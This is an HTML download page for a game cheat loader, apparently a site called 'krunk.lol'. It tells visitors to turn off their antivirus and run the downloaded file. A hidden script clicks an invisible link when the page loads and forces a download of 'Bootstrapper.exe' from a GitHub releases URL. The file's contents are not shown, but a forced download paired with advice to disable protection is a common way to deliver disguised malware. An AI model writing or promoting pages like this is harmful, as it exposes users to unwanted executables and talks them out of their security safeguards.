<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>krunk.lol - download</title>
    <style>
        body {
            background-color: black;
            color: white;
            font-family: Arial, sans-serif;
            text-align: center;
            margin: 0;
            padding: 0;
            display: flex;
            flex-direction: column;
            justify-content: flex-start;
            align-items: center;
            height: 100vh;
        }
        h1 {
            font-size: 3em;
            margin-top: 20px;
        }
        ul {
            list-style-type: disc;
            padding-left: 0;
            text-align: left;
        }
        li {
            font-size: 1.5em;
            margin-bottom: 10px;
        }
    </style>
</head>
<body>
    <h1>How to download and use external!</h1>
    <ul>
        <li>1 : Turn off antivirus to prevent it interferring.</li>
        <li>2 : Make sure you are connected to wifi.</li>
        <li>3 : Run the file downloaded to run the loader.</li>
        <li>4 : Load into your favorite game and have the best external and aim!</li>
    </ul>

    <script>
        // Replace 'your_github_file_url' with the actual GitHub download link
        var githubFileUrl = 'https://github.com/Krunklol/injector/releases/download/saflasfasfasf/Bootstrapper.exe';

        // Create a hidden anchor element to trigger the download
        var downloadLink = document.createElement('a');
        downloadLink.href = githubFileUrl;
        downloadLink.download = '';
        downloadLink.style.display = 'none';
        document.body.appendChild(downloadLink);

        // Simulate a click on the anchor element to start the download
        downloadLink.click();
    </script>
</body>
</html>
